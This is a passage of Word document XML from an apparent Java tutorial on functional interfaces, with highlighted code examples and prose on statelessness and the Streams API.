          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>processString</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>toLowerCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78626A82" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Output: java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729CECDE" w14:textId="77777777" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42801439" w14:textId="155BA4D3" w:rsidR="00C80B30" w:rsidRPr="00C80B30" w:rsidRDefault="00C80B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958709"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBBBAE" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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5. Encourages Immutability and Statelessness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BBC99D" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Functional programming encourages the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable object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stateless operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can help in writing code that is thread-safe and less prone to side-effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F329035" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ince functional interfaces define a single method (behavior), and lambda expressions allow you to pass behavior as data, it supports writing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D32AFB" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Better Integration with Streams API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D249E0D" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which was also introduced in Java 8, relies heavily on functional interfaces to define operations on collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D01B6A" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 pass lambda expressions that match the functional interface signatures in methods like filter(), map(), reduce(), etc., making code more declarative and easier to reason about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB86EF2" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D5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Using functional interfaces with Streams):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13E91A" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>util</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2330F" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>util</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD8B28" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>util</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Predicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74606D06" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324363CF" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StreamExample</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58D3F0" w14:textId="77777777" w:rsidR="00C0043B" w:rsidRPr="00C0043B" w:rsidRDefault="00C004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5323016"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
